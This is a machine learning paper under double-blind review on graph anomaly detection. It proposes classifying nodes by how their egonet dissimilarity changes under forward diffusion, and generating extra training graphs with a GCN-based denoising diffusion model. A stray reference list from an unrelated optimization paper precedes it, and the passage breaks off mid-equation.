conference on machine learning, pp. 242–252. PMLR, 2019. Anne Auger, Johannes Bader, Dimo Brockhoff, and Eckart Zitzler. Hypervolume-based multiobjective optimization: Theoretical foundations and practical implications. Theoretical Computer Science, 425:75–103, 2012. Toygun Basaklar, Suat Gumussoy, and Umit Y Ogras. Pd-morl: Preference-driven multi-objective reinforcement learning algorithm. arXiv preprint arXiv:2208.07914, 2022. Nicola Beume, Boris Naujoks, and Michael Emmerich. Sms-emoa: Multiobjective selection based on dominated hypervolume. European Journal of Operational Research, 181(3):1653–1669, 2007. J. Blank and K. Deb. pymoo: Multi-objective optimization in python. IEEE Access, 8:89497–89509, 2020. Julian Blank, Kalyanmoy Deb, Yashesh Dhebar, Sunith Bandaru, and Haitham Seada. Generating well-spaced points on a unit simplex for evolutionary many-objective optimization. IEEE Transactions on Evolutionary Computation, 25(1):48–60, 2020. S Borodachov, D Hardin, and E Saff. Asymptotics of best-packing on rectifiable sets. Proceedings of the American Mathematical Society, 135(8):2369–2380, 2007. Sergiy V Borodachov, Douglas P Hardin, and Edward B Saff. Discrete energy on rectifiable sets. Springer, 2019. Massimiliano Caramia, Paolo Dell’Olmo, Massimiliano Caramia, and Paolo Dell’Olmo. Multi-objective optimization. Multi-objective Management in Freight Logistics: Increasing Capacity, Service Level, Sustainability, and Safety with Optimization Algorithms, pp. 21–51, 2020. Minwoo Chae and Stephen G Walker. Wasserstein upper bounds of the total variation for smooth densities. Statistics & Probability Letters, 163:108771, 2020. Weiyu Chen and James Kwok. Multi-objective deep learning with adaptive reference vectors. Advances in Neural Information Processing Systems, 35:32723–32735, 2022. Indranee Das and John E Dennis. Normal-boundary intersection: A new method for generating the pareto surface in nonlinear multicriteria optimization problems. SIAM journal on optimization, 8(3):631–657, 1998. Kalyanmoy Deb and Hans-Georg Beyer. Self-adaptive genetic algorithms with simulated binary crossover. Evolutionary computation, 9(2):197–221, 2001. Kalyanmoy Deb and Debayan Deb. Analysing mutation schemes for real-parameter genetic algorithms. International Journal of Artificial Intelligence and Soft Computing, 4(1):1–28, 2014. Kalyanmoy Deb and Himanshu Jain. An evolutionary many-objective optimization algorithm using reference-point-based nondominated sorting approach, part i: solving problems with box constraints. IEEE transactions on evolutionary computation, 18(4):577–601, 2013. Kalyanmoy Deb, Ram Bhushan Agrawal, et al. Simulated binary crossover for continuous search space. Complex systems, 9(2):115–148, 1995. Kalyanmoy Deb, Amrit Pratap, Sameer Agarwal, and TAMT Meyarivan. A fast and elitist multiobjective genetic algorithm: Nsga-ii. IEEE transactions on evolutionary computation, 6(2):182–197, 2002a. Kalyanmoy Deb, Lothar Thiele, Marco Laumanns, and Eckart Zitzler. Scalable multi-objective optimization test problems. In Proceedings of the 2002 Congress on Evolutionary Computation. CEC’02 (Cat. No. 02TH8600), volume 1, pp. 825–830. IEEE, 2002b.
bA5o5eZplk
At the initial stages, the egonet dissimilarity of anomalies significantly outweighs that of normal instances as illustrated in Fig.2. Therefore, it's worth considering if exploiting this difference directly could lead to more efficient detection.
NEW RECIPES FOR GRAPH ANOMALY DETECTION: FORWARD DIFFUSION DYNAMICS AND GRAPH GENERATION Anonymous authors Paper under double-blind review ABSTRACT Distinguishing atypical nodes in a graph, which is known as graph anomaly detection, is more crucial than the generic node classification in real applications, such as fraud and spam detection. However, the lack of prior knowledge about anomalies and the extremely class-imbalanced data pose formidable challenges in learning the distributions of normal nodes and anomalies, which serves as the foundation of the state of the arts. We introduce a novel paradigm (first recipe) for detecting graph anomalies, stemming from our empirical and rigorous analysis of the significantly distinct evolving patterns between anomalies and normal nodes when scheduled noise is injected into the node attributes, referred to as the forward diffusion process. Rather than modeling the data distribution, we present three non-GNN methods to capture the evolving patterns and achieve promising results on nine widely-used datasets, while mitigating the oversmoothing limitation and shallow architecture of GNN methods. We further investigate the generative power of denoising diffusion models to synthesize training samples that align with the original graph semantics (second recipe). In particular, we derive two principles for designing the denoising neural network and generating graphs. With our proposed graph generation method, we attain record-breaking performance while our generated graphs are also capable of enhancing the results of existing methods. All the code and data are available at https://github.com/DiffAD/DiffAD. 1 INTRODUCTION Learning the graph data distribution with regard to its structure and node attributes serves as the foundation of static graph analysis (Chami et al., 2022; Cui et al., 2019), especially for detecting anomalous graph entities (Akoglu et al., 2015; Ma et al., 2021). Given the learned data distributions, anomalies are significantly divergent from normal entities due to the deviating mechanisms that generate them. Though anomalies are far rarer and much less dominant than the majority, recognizing their presence and understanding their significant impacts are even more crucial for real-world applications. To list a few, fraud detection in online social networks (Dou et al., 2020; Wang et al., 2023b; Gao et al., 2023b), fake news detection in social media (Wang et al., 2023a), rare molecule detection for drug discovery, malware detection in computing systems, and brain health monitoring (Xu et al., 2022a; Ma et al., 2023). More recently, graph neural networks (GNNs) have greatly advanced the frontier of graph machine learning, but learning the graph data distribution remains an open problem (Chen et al., 2022; Sun et al., 2023). Instead of solely learning either the structure distribution $p(A)$ or attribute distribution $p(X)$, graph learning techniques expect to learn the joint distribution $p(A, X)$ considering the complex relation between the graph structure and node attributes. In the realm of graph anomaly detection, effectively capturing the distributions of anomalies is even more challenging due to the lack of prior knowledge about them and the tremendous cost of acquiring labeled anomalies. Nevertheless, since the number of anomalies is far less than normal entities, vanilla models will bias on learning normal entities giving such extremely imbalanced data (Johnson & Khoshgoftaar, 2019). Figure 1: Two recipes for graph anomaly detection. Besides the challenges posed by the data for anomaly detection, GNNs also encounter intrinsic technical limitations (Azabou et al., 2023). Their fundamental message-passing (MP) mechanism undermines the effectiveness in learning the distributions of anomalies and normal nodes since vanilla MP aggregates anomalous and normal nodes’ features with each other. Such schema blends anomalies and normal nodes in the representation space (Liu et al., 2020) and prevents a deeper architecture of GNNs since nodes will collapse together when staking more MP layers (Keriven, 2022). In this paper, we first explore a novel paradigm to detect anomalies on a static graph without the need to explicitly learn its data distribution and to employ MP-GNNs. Our analysis on the differences between anomalies and their egonet neighbors, called egonet dissimilarity, illustrate that anomalies and normal nodes can be separated by gradually injecting $T$ scales of scheduled Gaussian noise into node attributes, referring to as the forward diffusion process. Scrutinizing the egonet dissimilarity changes in this process (Fig. 2(a)), we find that anomalies experience a more dramatic drop in egonet dissimilarity compared to normal nodes. We recognize this unexplored anomaly detection paradigm as classifying nodes in terms of their evolving trajectories in the forward diffusion. Suffering from the shortage of knowledge about anomalies, we further investigate graph generation, assuming that high quality synthesized data could facilitate anomaly detectors learning a better decision boundary. Inspired by denoising-based generative models, we have delved into the reverse diffusion process for graph generation, which is to denoise the data, and introduce two fundamental principles to design the denoising neural network such that the generated graphs adhere to the original graph semantics. By inspecting the forward diffusion process via the lens of graph’s spectrum, we discover a progressive shift in the graph’s spectral energy from lower frequencies to higher frequencies as the diffusion forwards, which is depicted in Fig. 2(b) and Fig. 3 that the energy ratios of lower frequency signals (corresponding to smaller eigenvalues) decrease continuously from diffusion step 0 to 100% while higher frequencies are becoming more dominant. These observations from the forward diffusion process underscore the need for the denoising network to 1) Explore each node’s egonet dissimilarity (capturing the local graph semantics) and 2) Recover the low frequency graph energy. Upon these findings, we offer two fresh recipes for graph anomaly detection: 1) Distinguishing anomalies based on the distinctive forward diffusion dynamics and 2) Synthesizing additional samples to complement detectors (as depicted in Fig. 1). For learning the divergent dynamics of anomalies, we design three innovative non-GNN methods (§5) and for the purpose of graph generation, we follow the principles and devise a novel generative graph diffusion framework for synthesizing graphs, particularly for anomaly detection (§6). The main contributions of this paper are: 1) A novel paradigm to detect graph anomalies. We, for the first time, propose to shift the focus of graph anomaly detection from learning a static data distribution to the exploration of dynamics in the forward diffusion process. This new paradigm enables us to promptly apply non-GNN techniques for investigating graph data, well-tackling the oversmoothing issues of MP-GNNs in anomaly detection. The promising results of our proposed non-GNN methods empirically underpin this as a potential research direction. 2) Two principles for designing the denoising-based graph diffusion model. Adhering to the principles, our model can generate supplementary and effective training samples to mitigate the shortage of labeled anomalies. Extensive experiments on real-world datasets demonstrate that these generated samples can significantly improve the detection performance. 3), we rigorously review and prove our observations on the diffusion process, which will serve as foundations for future works in graph anomaly detection. 2 PRELIMINARIES Static attributed graph. A static attributed graph \( G = \{A, X\} \) comprises \( n \) nodes with attributes. \( A_{i,j} \) in the adjacency matrix \( A \) is 1 if nodes \( v_i \) and \( v_j \) in \( G \) are directly connected; otherwise, 0. The attribute matrix \( X = [x_i]_{n \times k} \) contains each node \( v_i \)'s \( k \)-dimensional attribute vector. Egnet dissimilarity. The egonet dissimilarity \( \Omega = [\omega_i]_{n \times k} = LX \) quantifies how each node’s attributes are different from its egonet neighbors. \( L = I - D^{-\frac{1}{2}}AD^{-\frac{1}{2}} \) is the normalized graph Laplacian corresponding to \( G \) and \( D \) is the diagonal degree matrix. Forward graph diffusion (process). The forward graph diffusion is referred to as injecting \( T \) scales of scheduled noise to node attributes with the fixed graph structure. For each diffusion step \( \{t\}_T^0 \), the corrupted graph \( G_{t+1} = \{A, X_{t+1}\} \) are derived from \( G_t = \{A, X_t\} \), with \( G_0 = G \). Generative graph data augmentation for graph anomaly detection. We define generative graph data augmentation as to synthesize additional graphs \( G_a = \{G_a^1, \ldots, G_a^{|G_a|}\} \) for enhancing the graph anomaly detection performance. Each \( G_a^i = \{A, X_a^i\} \) has the same structure as the original graph \( G \) and the attribute distributions \( p(X_a^i | A) \sim p(X | A) \). Contextual anomalies and graph anomaly detection. In this paper, we aim to detect contextual anomalies, which are defined as nodes exhibiting significantly different attributes compared to their neighbors (Liu et al., 2022b). The detection is conducted with access to a small proportion of labeled data so as to simulate real scenarios. Given an attributed graph \( G \) containing both anomalies in \( V_1 \), and normal nodes in \( V_0 \), we aim to learn a classification function that maps each node \( v_i \in V \), \( V = V_1 \cup V_0 \) to its class label, which is 1 for anomalies and 0 for normal nodes, i.e., \( f : \{A, X\} \rightarrow y \in \{0, 1\}^n \). Practically, anomalies are far rarer than normal nodes, which means the cardinalities \( |V_1| \ll |V_0| \). 3 RELATED WORK 3.1 SEMI-/SUPERVISED GRAPH ANOMALY DETECTION Anomalous node detection, particularly contextual anomaly detection, is a key topic in graph anomaly detection (Akoglu et al., 2015; Ma et al., 2021; Gavrilev & Burnaev, 2023). These anomalies are rare compared to the majority, but are pervasive in real-world scenarios. Concrete examples include fake news in social media, business fraudsters in financial systems, and malfunctioning cortices in brain networks. Tremendous effort has been committed to learn the graph distribution for detecting the violating anomalies, and most recent approaches have shifted to adopting MP-GNNs to investigate the abnormal patterns of anomalies (Dou et al., 2020; Tang et al., 2022; Liu et al., 2022b). However, due to the oversmoothing issue of MP-GNNs, straightforwardly applying them to anomaly detection is non-trivial, spurring Dou et al. (2020), Liu et al. (2020) and others to mitigate the negative impact of MP or seek band-pass filters to capture the signals of anomalies (Tang et al., 2022). These approaches consider the technical challenges associated with GNNs, but solutions to the shortage of labeled anomalies still lack sufficient exploration. Others, such as Ding et al. (2019), Zheng et al. (2021), and Liu et al. (2021) expect to address this with unsupervised/contrastive learning techniques, but they only predict the irregularity (a continuous score) of each node and cannot explicitly classify anomalies. Although a human defined threshold can be utilized to label anomalies, determining an effective threshold under the unsupervised setting is non-trivial in practice (Ma et al., 2021; Akoglu, 2021). Following (Tang et al., 2022), we do not cover structural anomalies that form more densely links with other nodes (Liu et al., 2022b) as this type of anomalies only exhibit deviating structural patterns and can be effectively detected using structure statistics like node degree and centralities. 3.2 DENOISING DIFFUSION PROBABILISTIC MODEL (DDPM) Denoising diffusion probabilistic models (DDPMs) is a class of generative models built upon the forward diffusion process (diffusion process) and reverse process (denoising process) (Ho et al., --- 1 We use the terms ‘graph anomalies’ and ‘anomalous nodes’, as well as ‘node features’ and ‘node attributes’ interchangeably. We use anomalies to specifically represent contextual anomalies. The italic \( T \) specifically denotes noise scales while the superscript ‘\( T \)’ stands for the transpose of a matrix. To eliminate confusion, we use ‘egonet dissimilarity’ to specifically denote how each node’s attributes differ from its egonet neighbors, distinct from the embedding method used in previous works. Typically, the diffusion process is defined as a Markov chain that progressively adds a sequence of scheduled Gaussian noise, to corrupt the original data \( x_0 \) to standard Gaussian noise as follows: \[ q(x_T | x_0) = \prod_{t=1}^{T} q(x_t | x_{t-1}) = N(x_T; \sqrt{\alpha_T} x_0, (1 - \bar{\alpha}_T) I), \] where \( \bar{\alpha}_T = \prod_{t=1}^{T} (1 - \beta_t) \) and \( \beta_t \) is the variance of the noise at step \( t \). The denoising process is a reverse Markov chain that attempts to recover the original data from noise by \[ p_\theta(x_{0:T}) := p(x_T) \prod_{t=1}^{T} p_\theta(x_{t-1} | x_t), \quad p_\theta(x_{t-1} | x_t) := N(x_{t-1}; \mu_\theta(x_t, t), \Sigma_\theta(x_t, t)), \] where the mean \( \mu_\theta \) and variance \( \Sigma_\theta \) of distribution \( p_\theta(x_{t-1} | x_t) \) are learned using a deep neural network with parameters \( \theta \). By minimizing the Kullback-Leibler (KL) divergence between \( q(x_{t-1} | x_t, x_0) \) and \( p_\theta(x_{t-1} | x_t) \), which is \[ \arg \min_\theta D_{KL}(q(x_{t-1} | x_t, x_0) \| p_\theta(x_{t-1} | x_t)), \] the neural network will capture the original data distributions. Consequently, new samples (i.e., \( x_0^a \)) adhering to the original data distributions can be firmly generated by simply sampling \( x_T \sim N(0, I) \) and running the denoising process. Due to space limitations, we provide additional related works in graph anomaly detection and explanations of DDPM (including Eq. (3)) in Appendix A. 4 Preliminary Study: Anomalies’ Dynamics and Graph Energy Shifts in the Forward Diffusion Process The power of diffusion models in discerning different modes of the data stems from the forward and reverse diffusion processes. Our work investigates both processes and unveils two significant observations, particularly in the context of graph anomaly detection. 4.1 Preliminary Study Setup Our preliminary study aims at exploring: The deviating dynamics of graph anomalies and Changes in the graph spectral energy distributions during the forward diffusion. We conduct the study on Cora by fixing the graph structure and gradually injecting noise into node attributes. Specifically, we generate the noise employing two variance schedulers, i.e., linear scheduler and cosine scheduler, while the node attributes are randomly drawn from two Gaussian distributions, \( N(1, 1) \) for the normal class and \( N(1, 5) \) for anomalies, following Tang et al. (2022). Our observations are as follows. 4.2 Observation I - More dramatic changes in anomalies’ egonet similarities Since contextual anomalies have markedly distinct features compared to their egonet neighbors, we target the problem of what deviating patterns anomalies will manifest during the forward diffusion process. When measuring the average egonet dissimilarity \( \frac{1}{|V_y|} \sum_{v_j \in V_y} \omega_j \) for anomalies (\( y = 1 \)) and normal nodes (\( y = 0 \)) at each forward step, we surprisingly find that anomalies (the red line) undergo more substantial changes than normal nodes (the blue line), as depicted in Fig. 2(a). Proposition 1 Given \( T \) scales of noise from linear or cosine scheduler, when injecting them gradually into node attributes through the forward diffusion process, the egonet dissimilarities of anomalies change more dramatically than normal nodes. By this, we propose to detect anomalies by investigating the dynamics related to egonet dissimilarity \( \Omega_t \) in the diffusion process, as an alternation of learning the graph distribution. We recognize this as a novel paradigm for graph anomaly detection. Since learning \( p(A, X) \) is no longer mandatory, other powerful algorithms can be promptly adopted for detecting graph anomalies and breaking the limitations of MP-GNNs. As the pioneer in this line, we hereafter present three non-GNN models to capture such dynamics, namely FSC, TRC-TRANS, and TRC-MLP, built upon LSTM (Hochreiter & Schmidhuber, 1997), Transformer (Vaswani et al., 2017), and MLP (Goodfellow et al., 2016), respectively. Proof of this proposition is provided in Appendix B. 4.3 Observation II - Recovery the Low Frequency Energy for Graph Generation Considering the recent success of DDPMs in generating high-quality data samples (Ho et al., 2020; Nichol & Dhariwal, 2021; Song et al., 2021), we are motivated to synthesize additional training samples to enrich the training set and complement anomaly detectors. However, the critical capabilities that the denoising neural network should possess for synthesizing training samples, especially in the context of graph anomaly detection, remain unexplored. We inspect particular changes in the graph spectrum across forward diffusion. Given a original graph signal \( x \) (a column of \( X \)), a sequence of corrupted signal \((x_1, \ldots, x_T)^T\) in the forward diffusion process (by Eq. (1)) and the eigenvectors \( U = (u_1, \ldots, u_n)^T \) of the graph Laplacian \( L \), in which \( u_l \) is the eigenvector corresponding to the \( l \)-the smallest eigenvalue. We quantify the energy ratio of a particular frequency (rank \( l \)) at diffusion step \( t \) as \( \gamma_l(x_t, L) = (\hat{x}_l^t)^2 / \sum_{i=1}^{n} (\hat{x}_i^t)^2 \), where \( \hat{x}^t = U^T x_t = (\hat{x}_1^t, \ldots, \hat{x}_l^t, \ldots, \hat{x}_n^t)^T \) is the graph Fourier transformed signal. Taking \( l \) as a threshold, we identify signals \((\hat{x}_1^t, \ldots, \hat{x}_l^t)\) as low frequency signals and the rest are the high frequency. As depicted in Fig. 2(b), the ratios of low frequency signals are gradually decreasing while higher frequencies are becoming more significant along the forward diffusion process. We further delve into the overall ratios of low and high frequency signals with regard to different thresholds at each step \( t \) by measuring the accumulated energy ratio at rank \( l \) following Tang et al. (2022) as: \[ \Gamma_l(x_t, L) = \sum_{i=1}^{l} \gamma_i(x_t, L). \] We find that the accumulated energy is shifting to higher frequencies (as diffusion proceeds, the accumulated energy ratio with eigenvalues below a low threshold (e.g., 0.3) decreases continuously, as depicted Fig. 3) and we have the following expectation regarding \( \Gamma_l(x_t, L) \). **Proposition 2** The expectation of low frequency energy ratio \( \mathbb{E}_{x \sim N(\mu, \sigma^2)}[\Gamma_l(x_t, L)] \) is monotonically decreasing during the forward diffusion process. This indicates that the graph spectral energy distribution weights less on low frequency eigenvalues at step \( t \) than \( t-1 \), and to denoise \( x_t \) for obtaining \( x_{t-1} \), the denoising network needs to recover the lower frequency energy. The proof is in Appendix C. Ultimately, we identify two principles for designing denoising networks for DDPM-based graph generation. **Principle I** (from Observation I). The denoising neural network should be capable of capturing the local information in egones (the graph’s local semantics), such that the prior distribution \( p(X_a | A) \) of the generated graph aligns with the original distribution \( p(X | A) \), enabling the classifier to learn a more effective decision boundary to distinguish anomalies. **Principle II** (from Observation II). The denoising neural network needs to recover the low frequency energy. 5 Our Approach I – Learning Diffusion Dynamics for Graph Anomaly Detection Conforming to our novel paradigm for discerning anomalies upon the diffusion dynamics, in this section, we first introduce a new data structure for storing \( \Omega_t \) across forward diffusion, followed by our proposed sequence and trajectory learning based detection methods. Our algorithms are summarized in Appendix I. 5.1 Storing the Graph Information in Forward Diffusion The forward diffusion process corrupts the original node attributes with respect to \( T \) scales of scheduled noise. Eventually, the node attributes become standard Gaussian noise \( X_T \sim q(X_T | A) := \( \mathcal{N}(X_T; 0, I) \) and for any discrete time step \( t \in \{0, \ldots, T\} \), we can promptly infer the corrupted graph \( G_t = \{A, X_t\} \) based on Eq. (1) as follows: \[ X_t \sim q(X_t | X, A) = \mathcal{N}(X_t; \sqrt{\alpha_t}X, (1 - \bar{\alpha}_t)I). \] (5) We then employ a tensor \( G \in \mathbb{R}^{n \times T \times k} \) to store \( \{\Omega_t = LX_t\}_{t=0}^T \) at all diffusion steps. Specifically, the 2-D slice \( G_{i,:,:} = (\omega_0^i, \ldots, \omega_T^i)^T \) encapsulates node \( v_i \)'s egonet dissimilarity from step 0 to step \( T \). The 1-D slice \( G_{i,t,:} = \omega_t^i \in \mathbb{R}^k \) denotes \( v_i \)'s egonet dissimilarity at a particular step \( t \). Apparently, the memory cost of \( G \) is proportional to \( T \), thus we present a skip-step algorithm to reduce its size, and provide a batch implementation to facilitate training (in Appendix D). Given \( G \), we then reformulate graph anomaly detection as to classify nodes with regard to their corresponding 2-D slices and propose the following methods. ### 5.2 Forward sequence classification (FSC) Each 2-D slice \( G_{i,:,:} \) is typically a sequence of multivariate features derived from \( v_i \)'s egonet dissimilarity in the diffusion process. Our goal is to encode the long- and short-term evolving patterns of the forward sequence into a hidden state for classifying nodes. Consider node \( v_i \), we propose Fsc to revisit \( \omega_t^i \) at each diffusion step and generates its hidden state \( h_t^i \in \mathbb{R}^d \) using a LSTM: \[ \begin{align*} \tau_t^i &= \tanh(W_{\tau}G_{i,t,:} + U_{\tau}h_{t+1}^i + b_{\tau}), \\ f_t^i &= \tanh(W_fG_{i,t,:} + U_fh_{t+1}^i + b_f), \\ g_t^i &= \tanh(W_gG_{i,t,:} + U_gh_{t+1}^i + b_g), \\ o_t^i &= \tanh(W_oG_{i,t,:} + U_oh_{t+1}^i + b_o), \\ c_t^i &= f_t^i \odot c_{t+1}^i + \tau_t^i \odot g_t^i, \\ h_t^i &= o_t^i \odot \tanh(f_t^i \odot c_{t+1}^i + \tau_t^i \odot g_t^i), \end{align*} \] (6) where \( h_t^i, c_t^i, \tau_t^i, f_t^i, g_t^i \) and \( o_t^i \) are the hidden state, cell state, input gate, forget gate, cell gate, and output gate at step \( t \), respectively. \( \odot \) denotes the Hadamard product, and the initial \( h_T^i \sim \mathcal{N}(0, I) \). We then predict its probabilities of being normal or anomalous through a fully connected layer: \[ f(h_0^i; W_c, b_c) := \text{SOFTMAX}(h_0^iW_c + b_c), \] (9) where \( W_c \in \mathbb{R}^{d \times 2} \) and \( b_c \in \mathbb{R}^2 \) are trainable parameters. Regarding the extremely imbalanced data, we adjust the weights of anomalies and normal nodes in the training objective so as to regularize the model focuses equally on both classes. This class-wise training objective is to minimize: \[ L = - \sum_{y \in \{0, 1\}} \sum_{v_i \in V_y} \frac{1}{|V_y|} \log \psi(v_i | y), \] (10) where \( \psi(v_i | y) \) is the predicted possibility of \( v_i \) being anomalous (\( y = 1 \)) or normal (\( y = 0 \)). ### 5.3 Trajectory representation-based classification (TRC) While FSC predicts a hidden state from the forward sequence for distinguishing anomalies, we propose TRC to learn a representation for each node’s trajectory and detect anomalies upon it. As to capture the whole trajectory, for each node \( v_i \), TRC first encodes \( G_{i,t,:} \) at each diffusion step \( t \) into a latent space and then reads the trajectory representation out from all the steps following: \[ h_{i,TR}^t = \text{READOUT}\left[\cup_{t \in [0,T]} g(G_{i,t,:}; \theta_g)\right], \quad \text{and} \quad h_{i,TR}^t \in \mathbb{R}^d, \] (11) where \( g(\cdot; \theta_g) \) is the function for encoding \( G_{i,t,:} \), and READOUT(\(\cdot\)) is to fuse the information at each diffusion step and extract trajectory representation \( h_{i,TR}^t \). We hereafter propose TRC-TRANS, and TRC-MLP to implement both functions. In TRC-TRANS, we adopt the raw Transformer architecture and generate the trajectory representation by passing \( G_{i,:,:} \) through the self-attention module (ATTN) and position-wise feed-forward neural network (FFN), which follows: \[ \text{ATTN}(\tilde{G}_{i,:,:}) = \text{SOFTMAX}(\frac{Q_iK_i^\top}{\sqrt{k}})V_i, \quad h_{i,TR}^t = \text{READOUT}\{\text{FFN}[\text{ATTN}(\tilde{G}_{i,:,:})]\}, \] (12) with \[ Q_i = \tilde{G}_{i,:,:}W_Q, \quad K_i = \tilde{G}_{i,:,:}W_K, \quad V_i = \tilde{G}_{i,:,:}W_V, \] (13) where \( W_Q, W_K, \) and \( W_V \in \mathbb{R}^{k \times k} \) are the projection matrices for \( Q, K, \) and \( V \), respectively. \( \tilde{G}_{i,:,:} \) is \( v_i \)'s corresponding 2-D slice after adding the position encoding (Eq. (48)). The READOUT function is a fully connected layer. Ultimately, the trajectory representation-based classification is performed through the classifier formulated in Eq. (9) by replacing \( h_0^i \) with \( h_{i,TR}^t \) and the whole model can be flexibly trained via minimizing Eq. (10). For space limitation, we provide details of this readout function and present an even straightforward yet effective MLP-based model in Appendix E. 6 OUR APPROACH II - GENERATIVE GRAPH ANOMALY DETECTION Motivated by the success of generative models in synthesizing high quality data samples, we propose a novel DDPM-based graph diffusion model (namely DiffAD) to generate auxiliary training samples and complement detectors for more effective anomaly detection. 6.1 REVERSE PROCESS FOR DATA DISTRIBUTION MODELING Let \( \{G_t\}_{t=0}^T \) denote a sequence of noised graphs in the forward graph diffusion process, each \( G_t = \{A, X_t\} \) and \( X_t \sim q(X_t | X_{t-1}, A) = N(X_t; \sqrt{\alpha_t}X_{t-1}, (1 - \bar{\alpha}_t)I) \) (detailed in §5.1). Our goal is to learn the original graph data distribution through the reverse process, which can be practically described as to learn a denoising network in accordance with Eq. (3): \[ \theta^* = \arg\min_\theta D_{KL}[q(X_{t-1} | X_t, X, A) \| p_\theta(X_{t-1} | X_t, A)]. \] (14) Given the fact that node attributes of the corrupted graph at each forward step \( t \) follow distribution \( N(X_t; \sqrt{\alpha_t}X_{t-1}, (1 - \bar{\alpha}_t)I) \), learning \( \theta^* \) via Eq. (14) is actually estimating the mean value \( \sqrt{\alpha_t}X_{t-1} \) and variance \( (1 - \bar{\alpha}_t)I \) of the prior step \( t-1 \) using graph \( G_t \) (detailed in Appendix G). Upon our design Principle II (§4.3), which advises that the denoising network should recover low frequency signals, we opt to use graph convolutional neural network (GCN) (Kipf & Welling, 2017) as the backbone because of its capacity to act as a low-pass filter, attenuating high frequency signals and emphasizing lower frequencies (Nt & Maehara, 2019; Keriven, 2022). From the spatial perspective, GCN inherently explores the local graph semantics, which aligns with our principle I. Our proposed model DiffAD has two ingredients: a step-dependent GCN (SDN) for learning node representations \( Z_t \) at step \( t \) and DEN for estimating the distribution (mean and variance) of \( X_{t-1} \). 6.1.1 STEP-DEPENDENT GCN - SDN Built on Kipf & Welling (2016), we assume that the latent node representations also conform to a Gaussian distribution which is \( p(Z_t | X_t, A, t) \sim N(\mu_{SDN}^t, \text{diag}(\Sigma_{SDN}^t)) = \prod_{i=1}^n p(z_i^t | X_t, A, t) \), with \( p(z_i^t | X_t, A, t) = N(z_i^t; \mu_{i,t}, \sigma_{i,t}^2) \). The matrices \( \mu_{SDN}^t \) and \( \text{diag}(\Sigma_{SDN}^t) \) summarize the mean and variance vectors \( (\mu_{i,t}, \sigma_{i,t}^2) \) of node representations \( z_i^t \) at step \( t \), which are generated by: \[ \mu_{SDN}^t = \text{SDN}_\mu(X_t, A, t) = \tilde{A} \text{ReLU}[\tilde{A}(X_t + TE(t))W_1^{SDN}]W_2^{SDN}, \] (15) \[ \log[\text{diag}(\Sigma_{SDN}^t)] = \text{SDN}_\sigma(X_t, A, t) = \tilde{A} \text{ReLU}[\tilde{A}(X_t + TE(t))W_1^{SDN}]W_3^{SDN}, \] (16) where \( \tilde{A} = D^{-\frac{1}{2}}AD^{-\frac{1}{2}} \) is the normalized adjacency matrix. \( W_1^{SDN}, W_2^{SDN} \) and \( W_3^{SDN} \) are variables in the GCN layers. \( \text{SDN}_\mu \) and \( \text{SDN}_\sigma \) share the first layer, parametrized by \( W_1^{SDN} \). We incorporate the diffusion step \( t \) in the learning process by encoding it as a matrix given by \( TE(\cdot) \) (see Appendix F). 6.1.2 DISTRIBUTION ESTIMATING GCN - DEN Then, we propose DEN for predicting the less noisy node attributes \( X_{t-1} \) with \( Z_t \). Empirically, this is to estimate the mean and variance of \( X_{t-1} \) (in Eq. (5)) and we obtain them by \[ p(X_{t-1} | Z_t, \tilde{Z}_t, A) \sim N(\mu_{DEN}^{t-1}, \text{diag}(\Sigma_{DEN}^{t-1})) := \prod_{i=1}^N p(x_{i,t-1}^t | z_i^t, \tilde{z}_i^t, A), \] (17) with \( p(x_{i,t-1}^t | z_i^t, \tilde{z}_i^t, A) = N(x_{i,t-1}^t; \mu_{i,t-1}^t, \sigma_{i,t-1}^2) \), where \( \tilde{z}_i^t \in \tilde{Z}_t \) is the output of the first GCN layer in SDN. We take this residual information from SDN as to prevent oversmoothing and further validate its effectiveness through the ablation study in §8. Notably, different from SDN, the matrices \( \mu_{DEN}^{t-1} \) and \( \text{diag}(\Sigma_{DEN}^{t-1}) \) summarize the mean vectors \( \mu_{i,t-1}^t \) and \( \sigma_{i,t-1}^2 \) of \( x_{i,t-1}^t \) to describe the distribution of \( X_{t-1} \), and are learned through a two-layered GCN similar to SDN as follows: \[ \mu_{DEN}^{t-1} = \text{DEN}_\mu(Z_t, \tilde{Z}_t, A) = \tilde{A} \{\text{ReLU}[\tilde{A}(Z_t \oplus \tilde{Z}_t)W_1^{DEN}]\} \oplus \tilde{Z}_t W_2^{DEN}, \] (18) \[ \log[\text{diag}(\Sigma_{t-1}^{\text{DEN}})] = \text{DEN}_{\sigma'}(\mathbf{Z}_t, \tilde{\mathbf{Z}}_t, \mathbf{A}) = \tilde{\mathbf{A}} \{[\text{ReLU}(\tilde{\mathbf{A}}(\mathbf{Z}_t \oplus \tilde{\mathbf{Z}}_t)W_1^{\text{DEN}})] \oplus \tilde{\mathbf{Z}}_t\} W_3^{\text{DEN}}, \] where \( \oplus \) is for concatenation, \( W_1^{\text{DEN}}, W_2^{\text{DEN}} \) and \( W_3^{\text{DEN}} \) parameterize the GCN layers. ### 6.1.3 Simplified Training Objective of the Reverse Process Eventually, all parameters \( \theta = \{W_i^{\text{SDN}}\}_{i=1}^{3} \cup \{W_i^{\text{DEN}}\}_{i=1}^{3} \cup \{W_i^{\text{TE}}\}_{i=1}^{2} \) can be promptly fine-tuned with regard to Eq. (14) at each diffusion step. Likewise for the simplified training objective of DDPM, our training objective can be reformulated as to predict the added noise: \[ \theta^* = \arg \min_{\theta} \mathbb{E}_{X,\epsilon}(\|\epsilon - \epsilon_\theta\|_2^2), \] where \( \epsilon_\theta \) is the predicted noise. For space limitation, we provide details in Appendix G. ### 6.2 Graph Generation Once the whole model is sufficiently trained, we can simply sample \( X_T \) from \( \mathcal{N}(0, I) \) and generate a new graph \( G_a \) by reversing the \( T \) step forward diffusion (Eq. (2)) following: \[ X_{t-1} = \frac{1}{\sqrt{\alpha_t}} \left( X_t - \frac{1 - \alpha_t}{\sqrt{1 - \alpha_t}} \epsilon_\theta(X_t, A, t) \right) + \sigma_t \epsilon^*, \] where \( \epsilon^* \sim \mathcal{N}(0, I) \), and \( \sigma_t^2 = \frac{1 - \bar{\alpha}_{t-1}}{1 - \alpha_t} \beta_t \). The generated sample can be then utilized as auxiliary data to enhance the anomaly detectors. The full algorithms are summarized in Appendix H and I. ### 6.3 Graph Anomaly Detection with Generated Samples Given a set of generated graphs \( G_a = \{G_1^a, \ldots, G_{|G_a|}^a\} \) and the original graph \( G \), we then train a two-layered GCN classifier (see Appendix F) by reformulating the class-wise objective in Eq. (10) to involve the training signals from the generated graphs, which can be formulated as: \[ L = - \sum_{y \in \{0, 1\}} 